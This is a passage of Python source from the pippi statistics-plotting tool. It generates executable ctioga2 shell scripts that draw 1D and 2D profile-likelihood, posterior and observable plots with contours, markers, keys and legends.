colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
markers.append([postMeanData[0], postMeanData[1], postMeanData[2], 'Mean'])
# Get details of key for best fit
markers.append([bestFitData[0], bestFitData[1], bestFitData[2], 'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[2] /= 1.5
if key[2] > 1.0: key[2] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 7: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[4]+' /color \''+\
key[5]+'\' /scale '+str(key[6]*key[2])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /color \''+key[1]+'\' /scale '+str(key[2])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[3]+'\' /color \''+colours.value.keyTextColour1D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_combo1D.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_combo1D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
outfile.write(' --frame-margins '+str(left_margin)+','
+str(right_margin)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange 0:1\\\n')
outfile.write(' --ylabel \'Relative probability $P/P_\mathrm{max}$\' /shift 2.1\\\n')
outfile.write(' --xlabel \''+labels.value[plot]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.15')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write('\\\n')
if contours1D.value is not None:
if main == 'like':
main_colour = colours.value.mainProfColour1D
main_text = 'CL'
sec_colour = colours.value.mainPostColour1D
sec_text = 'CR'
else:
main_colour = colours.value.mainPostColour1D
main_text = 'CR'
sec_colour = colours.value.mainProfColour1D
sec_text = 'CL'
for i, contour in enumerate(mainContourLevels):
outfile.write(' --draw-line '+str(xtrema[0])+','+contour+' '+str(xtrema[1])+','+contour+' /color \''+main_colour+
'\' /style Dashes /width '+str(float(colours.value.lineWidth1D)*0.5)+'\\\n')
outfile.write(' --draw-text '+str(xtrema[0]+0.045*(xtrema[1]-xtrema[0]))+','+str(float(contour)+0.005)+' \''+str(contours1D.value[i])+
'\%'+main_text+'\' /color \''+main_colour+'\' /scale 0.5 /justification left /alignment bottom\\\n')
for i, contour in enumerate(secContourLevels):
outfile.write(' --draw-line '+str(xtrema[0])+','+contour+' '+str(xtrema[1])+','+contour+' /color \''+sec_colour+
'\' /style Dashes /width '+str(float(colours.value.lineWidth1D)*0.5)+'\\\n')
outfile.write(' --draw-text '+str(xtrema[0]+0.045*(xtrema[1]-xtrema[0]))+','+str(float(contour)+0.005)+' \''+str(contours1D.value[i])+
'\%'+sec_text+'\' /color \''+sec_colour+'\' /scale 0.5 /justification left /alignment bottom\\\n')
# Plot comparison distribution
outfile.write(' --plot '+currentParse+'_'+sec+'1D'+histString+'.ct2@1:2 /fill xaxis /fill-transparency '+colours.value.fillTransparency1D+
' /fill-color '+secData[3]+' /color '+secData[3]+
' /line-style '+colours.value.comparison1DLineStyle+' /line-width '+colours.value.lineWidth1D+'\\\n')
# Plot main distribution
outfile.write(' --plot '+currentParse+'_'+main+'1D'+histString+'.ct2@1:2 /fill xaxis /fill-transparency '+colours.value.fillTransparency1D+
' /fill-color '+mainData[3]+' /color '+mainData[3]+
' /line-style '+colours.value.main1DLineStyle+' /line-width '+colours.value.lineWidth1D+'\\\n')
if doLegend1D.value is not None and plot in doLegend1D.value:
# Write legend
try:
legendLocation = legendLoc1D.value[plot]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour1D+'\'\\\n')
outfile.write(' --legend-line \'Like vs. Posterior\' /color \''+colours.value.legendTextColour1D+'\'\\\n')
# Get best-fit point
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
# Get posterior mean
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
# Always plot both best fit and posterior mean on comparison plot
outfile.write(' --draw-marker '+str(bestFit)+','+str(yRange*bestFitData[2]/40.0)+' '+bestFitData[0]+' /color \''+bestFitData[1]+
'\' /scale '+str(bestFitData[2])+' \\\n')
if postMean: outfile.write(' --draw-marker '+str(postMean)+','+str(yRange*postMeanData[2]/40.0)+' '+postMeanData[0]+' /color \''+postMeanData[1]+
'\' /scale '+str(postMeanData[2])+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour1D+'\'\\\n')
outfile.close()
subprocess.call('chmod +x '+currentBase+'_combo1D.bsh', shell=True)
# Create 2D plotting scripts
if twoDplots.value is not None:
# Loop over requested plots
for plot in twoDplots.value:
print ' Writing scripts for 2D plots of quantities ',plot
# Set up filenames
currentBase = baseFilename+'_'+'_'.join([str(x) for x in plot])
currentParse = parseFilenameFromScriptFiledir+'_'+'_'.join([str(x) for x in plot])
currentBaseMinimal = re.sub(r'.*/', '', currentBase)
if doComparison.value: currentSecParse = secParseFilenameFromScriptFiledir+'_'+'_'.join([str(x) for x in plot])
# Get plot limits
xtrema = dictFallback(axisRanges,dataRanges,plot[0])
ytrema = dictFallback(axisRanges,dataRanges,plot[1])
xRange = xtrema[1] - xtrema[0]
yRange = ytrema[1] - ytrema[0]
# Locate and scale logo (if any)
if logoFile.value is not None:
logoCoords = [xtrema[0]+logoLoc.value[0][0]*xRange,ytrema[0]+logoLoc.value[0][1]*yRange]
logoString = '\'\\includegraphics[width = '+str(logoWidth.value*8.8)+'cm]{'+logoFile.value+'}\''
# Determine reference point
if refPoint.value is not None and all([x in refPoint.value for x in plot]):
plotRef = True
refString = ' --draw-marker '+str(refPoint.value[plot[0]])+','+str(refPoint.value[plot[1]])+' '+\
colours.value.referenceMarkerInner+' /color \''+colours.value.referenceMarkerInnerColour+\
'\' /scale '+str(colours.value.referenceMarkerInnerScale)+' \\\n'+\
' --draw-marker '+str(refPoint.value[plot[0]])+','+str(refPoint.value[plot[1]])+' '+\
colours.value.referenceMarkerOuter+' /color \''+colours.value.referenceMarkerOuterColour+\
'\' /scale '+str(colours.value.referenceMarkerOuterScale)+' \\\n'
else:
plotRef = False
# Determine plot size
if plotSize.value is None or plotSize.value == '':
if doColourbar.value is not None and plot in doColourbar.value:
plotSizeInternal = '12.5cm x 4in'
else:
plotSizeInternal = '11cm x 4in'
else:
plotSizeInternal = plotSize.value
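# A wider page ('12.5cm x 4in' rather than '11cm x 4in') is used when a colour bar is
# requested for this plot, leaving room for the bar and its label on the right.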
# Make profile likelihood plotting scripts
if doProfile.value:
# Get contours
if contours2D.value is not None:
contourLevels = getContours(parseFilename,plot,'like')
# Determine keys
keyString = ''
if doKey2D.value is not None and plot in doKey2D.value:
# Get gross key location
try:
keyLoc = keyLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
keyLoc = defaultKeyLocation
# Get text to be used for reference point
refText = defaultRefKey if refKey.value is None else refKey.value
# Get x and y coordinates for 3 possible keys (for markers and text)
yVals = ytrema[0] + np.array(keyYVals[keyLoc[0]])*yRange
xVals = xtrema[0] + np.array(keyXVals[keyLoc[1]])*xRange
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale,
refText,
colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour,
colours.value.referenceMarkerInnerScale/colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
if postMeanOnProf.value: markers.append([colours.value.mainPostMeanMarker,
colours.value.mainPostMeanColour2D,
colours.value.mainPostMeanColourOutline2D,
colours.value.mainPostMeanMarkerScale,
'Mean'])
# Get details of key for best fit
if bestFitOnProf.value: markers.append([colours.value.mainBestFitMarker,
colours.value.mainBestFitColour2D,
colours.value.mainBestFitColourOutline2D,
colours.value.mainBestFitMarkerScale,
'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[3] /= 1.5
if key[3] > 1.0: key[3] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 8: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[5]+' /color \''+\
key[6]+'\' /scale '+str(key[7]*key[3])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /fill-color \''+str(key[1])+'\' /stroke-color \''+str(key[2])+'\' /scale '+str(key[3])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[4]+'\' /color \''+colours.value.keyTextColour2D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_like2D.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_like2D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --frame-margins '+str(left_margin+0.03)+','
+str(right_margin+0.15)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
else:
outfile.write(' --frame-margins '+str(left_margin+0.05)+','
+str(right_margin+0.02)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+labels.value[plot[1]]+'\' /shift 2.9\\\n')
outfile.write(' --xlabel \''+labels.value[plot[0]]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.75')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write(" /valign 'midheight'")
outfile.write('\\\n --xyz-map\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --new-zaxis zvalues /location right /bar_size \'0.5cm\'\\\n')
outfile.write(" --label-style zvalues /angle 270 /shift 0.4 /valign 'midheight'\\\n")
outfile.write(' --plot '+currentParse+'_like2D.ct2@1:2:3 ')
if doColourbar.value is not None and plot in doColourbar.value: outfile.write('/zaxis zvalues ')
outfile.write('/color-map \''+colours.value.colourMap(contourLevels,'like')+'\'\\\n')
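# The parsed 2D data are drawn in ctioga2's xyz-map mode, reading columns 1:2:3 (x, y, z)
# from the .ct2 file; colourMap presumably returns a ctioga2 colour-map specification
# anchored at the supplied contour levels.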
if doComparison.value:
# Do everything for comparison chain
if contours2D.value is not None:
# Plot contours
outfile.write(' --plot '+currentSecParse+'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
for contour in contourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.comparisonProfContourColour2D+
' /style '+colours.value.comparisonContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if bestFitOnProf.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(secParseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour+
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(secParseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour+
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse+'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
if contours2D.value is not None:
# Plot contours
for contour in contourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.mainProfContourColour2D+
' /style '+colours.value.mainContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if doLegend2D.value is not None and plot in doLegend2D.value:
# Write legend
try:
legendLocation = legendLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
outfile.write(' --legend-line \'Prof.~likelihood\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
if bestFitOnProf.value:
# Get best-fit point and plot it
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+
colours.value.mainBestFitMarker+' /fill-color \''+str(colours.value.mainBestFitColour2D)+'\' /stroke-color \''+str(colours.value.mainBestFitColourOutline2D)+
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value:
# Get posterior mean and plot it
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+
colours.value.mainPostMeanMarker+' /fill-color \''+str(colours.value.mainPostMeanColour2D)+'\' /stroke-color \''+str(colours.value.mainPostMeanColourOutline2D)+
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour2D+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
# Do labelling for colourbar
outfile.write(' --y2 --plot '+currentParse+'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
outfile.write(' --axis-style y /decoration ticks --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+likeColourbarString+'\' /shift 3.5 /angle 180 /scale 0.8\\\n')
outfile.close()
subprocess.call('chmod +x '+currentBase+'_like2D.bsh', shell=True)
# Make posterior pdf plotting scripts
if doPosterior.value:
# Get contours
if contours2D.value is not None:
mainContourLevels = getContours(parseFilename,plot,'post')
if doComparison.value: secContourLevels = getContours(secParseFilename,plot,'post')
# Determine keys
keyString = ''
if doKey2D.value is not None and plot in doKey2D.value:
# Get gross key location
try:
keyLoc = keyLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
keyLoc = defaultKeyLocation
# Get text to be used for reference point
refText = defaultRefKey if refKey.value is None else refKey.value
# Get x and y coordinates for 3 possible keys (for markers and text)
yVals = ytrema[0] + np.array(keyYVals[keyLoc[0]])*yRange
xVals = xtrema[0] + np.array(keyXVals[keyLoc[1]])*xRange
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale,
refText,
colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour,
colours.value.referenceMarkerInnerScale/colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
if postMeanOnPost.value: markers.append([colours.value.mainPostMeanMarker,
colours.value.mainPostMeanColour2D,
colours.value.mainPostMeanColourOutline2D,
colours.value.mainPostMeanMarkerScale,
'Mean'])
# Get details of key for best fit
if bestFitOnPost.value: markers.append([colours.value.mainBestFitMarker,
colours.value.mainBestFitColour2D,
colours.value.mainBestFitColourOutline2D,
colours.value.mainBestFitMarkerScale,
'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[3] /= 1.5
if key[3] > 1.0: key[3] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 8: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[5]+' /color \''+\
key[6]+'\' /scale '+str(key[7]*key[3])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /fill-color \''+str(key[1])+'\' /stroke-color \''+str(key[2])+'\' /scale '+str(key[3])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[4]+'\' /color \''+colours.value.keyTextColour2D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_post2D.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_post2D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --frame-margins '+str(left_margin+0.03)+','
+str(right_margin+0.15)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
else:
outfile.write(' --frame-margins '+str(left_margin+0.05)+','
+str(right_margin+0.02)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+labels.value[plot[1]]+'\' /shift 2.9\\\n')
outfile.write(' --xlabel \''+labels.value[plot[0]]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.75')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write(" /valign 'midheight'")
outfile.write('\\\n --xyz-map\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --new-zaxis zvalues /location right /bar_size \'0.5cm\'\\\n')
outfile.write(" --label-style zvalues /angle 270 /shift 0.4 /valign 'midheight'\\\n")
outfile.write(' --plot '+currentParse+'_post2D.ct2@1:2:3 ')
if doColourbar.value is not None and plot in doColourbar.value: outfile.write('/zaxis zvalues ')
outfile.write('/color-map \''+colours.value.colourMap(mainContourLevels,'post')+'\'\\\n')
if doComparison.value:
# Do everything for comparison chain
if contours2D.value is not None:
# Plot contours
outfile.write(' --plot '+currentSecParse+'_post2D.ct2@1:2:3 /fill-transparency 1\\\n')
for contour in secContourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.comparisonPostContourColour2D+
' /style '+colours.value.comparisonContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if bestFitOnPost.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(secParseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour+
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnPost.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(secParseFilename,plot,'post',lookupKeys)
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour+
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse+'_post2D.ct2@1:2:3 /fill-transparency 1\\\n')
if contours2D.value is not None:
# Plot contours
for contour in mainContourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.mainPostContourColour2D+
' /style '+colours.value.mainContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if doLegend2D.value is not None and plot in doLegend2D.value:
# Write legend
try:
legendLocation = legendLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
outfile.write(' --legend-line \'Marg.~posterior\' /color \''+colours.value.legendTextColour2D+'\'\\\n')
if bestFitOnPost.value:
# Get best-fit point and plot it
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+
colours.value.mainBestFitMarker+' /fill-color \''+str(colours.value.mainBestFitColour2D)+'\' /stroke-color \''+str(colours.value.mainBestFitColourOutline2D)+
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnPost.value:
# Get posterior mean and plot it
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+
colours.value.mainPostMeanMarker+' /fill-color \''+str(colours.value.mainPostMeanColour2D)+'\' /stroke-color \''+str(colours.value.mainPostMeanColourOutline2D)+
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour2D+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
# Do labelling for colourbar
outfile.write(' --y2 --plot '+currentParse+'_post2D.ct2@1:2:3 /fill-transparency 1\\\n')
outfile.write(' --axis-style y /decoration ticks --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+postColourbarString+'\' /shift 3.5 /angle 180 /scale 0.8\\\n')
outfile.close()
subprocess.call('chmod +x '+currentBase+'_post2D.bsh', shell=True)
# Make observable plotting scripts
#if doObservable.value:
if obsPlots.value is not None:
for column in obsPlots.value:
# Get contours
if contours2D.value is not None:
contourLevelsLike = getContours(parseFilename,plot,'like')
contourLevelsObs = getContours_obs(parseFilename,plot,column)
# Determine keys
keyString = ''
if doKey2D.value is not None and plot in doKey2D.value:
# Get gross key location
try:
keyLoc = keyLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
keyLoc = defaultKeyLocation
# Get text to be used for reference point
refText = defaultRefKey if refKey.value is None else refKey.value
# Get x and y coordinates for 3 possible keys (for markers and text)
yVals = ytrema[0] + np.array(keyYVals[keyLoc[0]])*yRange
xVals = xtrema[0] + np.array(keyXVals[keyLoc[1]])*xRange
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale,
refText,
colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour,
colours.value.referenceMarkerInnerScale/colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
if postMeanOnProf.value: markers.append([colours.value.mainPostMeanMarker,
colours.value.mainPostMeanColour2D,
colours.value.mainPostMeanColourOutline2D,
colours.value.mainPostMeanMarkerScale,
'Mean'])
# Get details of key for best fit
if bestFitOnProf.value: markers.append([colours.value.mainBestFitMarker,
colours.value.mainBestFitColour2D,
colours.value.mainBestFitColourOutline2D,
colours.value.mainBestFitMarkerScale,
'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[3] /= 1.5
if key[3] > 1.0: key[3] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 8: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[5]+' /color \''+\
key[6]+'\' /scale '+str(key[7]*key[3])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /fill-color \''+str(key[1])+'\' /stroke-color \''+str(key[2])+'\' /scale '+str(key[3])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[4]+'\' /color \''+colours.value.keyTextColour2D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_obs2D_'+str(column)+'.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_obs2D_'+str(column))
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --frame-margins '+str(left_margin+0.03)+','
+str(right_margin+0.15)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
else:
outfile.write(' --frame-margins '+str(left_margin+0.05)+','
+str(right_margin+0.02)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+labels.value[plot[1]]+'\' /shift 2.9\\\n')
outfile.write(' --xlabel \''+labels.value[plot[0]]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.75')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write(" /valign 'midheight'")
outfile.write('\\\n --xyz-map\\\n')
outfile.write(' --plot '+currentParse+'_obs2D_'+str(column)+'.ct2@1:2:3 ')
#if doColourbar.value is not None and plot in doColourbar.value: outfile.write('/zaxis zvalues ')
outfile.write('/color-map \''+colours.value.colourMap(contourLevelsObs,'obs')+'\'\\\n')
if doComparison.value:
# Do everything for comparison chain
if contours2D.value is not None:
# Plot contours
outfile.write(' --plot '+currentSecParse+'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
for contour in contourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.comparisonProfContourColour2D+
' /style '+colours.value.comparisonContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if bestFitOnProf.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(secParseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' '+
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour+
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(secParseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' '+
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour+
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
